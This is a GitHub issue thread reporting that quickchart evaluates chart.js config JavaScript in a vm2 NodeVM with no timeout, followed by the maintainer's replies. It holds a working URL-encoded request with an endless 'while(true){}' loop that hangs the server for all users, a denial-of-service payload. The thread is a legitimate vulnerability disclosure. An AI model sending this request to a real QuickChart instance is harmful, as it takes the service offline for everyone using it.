quickchart
Chart JS evaluation can enter endless loop
Evaluation of JS embedded in the chart.js specification is done via NodeVM which doesn't support timeouts: https://github.com/typpo/quickchart/blob/master/lib/charts.js#L133
Due to this it's possible for the evaluation to enter an endless loop which hangs the server (restart of the node process required to make it work again).
For example this request will let the process hang for all users, no charts will be served: http://localhost:3400/chart?c=%7B%0A%20%20type%3A%20%27bar%27%2C%0A%20%20data%3A%20%7B%0A%20%20%20%20labels%3A%20%5B%27Q1%27%2C%20%27Q2%27%2C%20%27Q3%27%2C%20%27Q4%27%5D%2C%0A%20%20%20%20datasets%3A%20%5B%7B%0A%20%20%20%20%20%20label%3A%20%27Users%27%2C%0A%20%20%20%20%20%20data%3A%20%5B50%2C%2060%2C%2070%2C%20180%5D.map((x)%20%3D%3E%20%7Bwhile(true){}%20return%20x%20%7D)%0A%20%20%20%20%7D%2C%20%7B%0A%20%20%20%20%20%20label%3A%20%27Revenue%27%2C%0A%20%20%20%20%20%20data%3A%20%5B100%2C%20200%2C%20300%2C%20400%5D%0A%20%20%20%20%7D%5D%0A%20%20%7D%0A%7D%0A
This can also be used as an effective DoS attack.
Hi @flash1293, chart evaluation is subject to the limitations of NodeVM and should only be open to trusted parties. This is noted in the readme:
If you are hosting QuickChart yourself, take care not to expose the service to untrusted parties. Because Chart.js configs may contain arbitrary JavaScript, it is necessary to properly sandbox your QuickChart instance.
You may choose to sandbox your instance in other ways, but generally it is difficult to secure arbitrary JS execution.
Maybe I missed something but it seems possible to use the VM class instead of the NodeVM class in this case which does support timeouts.
Closing this out again as vm2's timeout won't work on operations in returned objects, which is how this project uses it.